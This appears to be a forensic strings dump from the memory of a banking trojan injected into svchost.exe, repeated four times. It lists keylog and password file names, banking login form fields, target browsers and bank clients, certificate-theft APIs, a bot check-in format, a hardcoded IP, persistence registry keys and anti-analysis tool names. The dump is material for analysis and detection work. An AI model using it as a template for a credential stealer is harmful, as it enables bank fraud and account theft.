Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1048_rwx_00720000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1048_rwx_00A90000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

LOCALSERVICE!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1156_rwx_00EF0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1156_rwx_01260000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

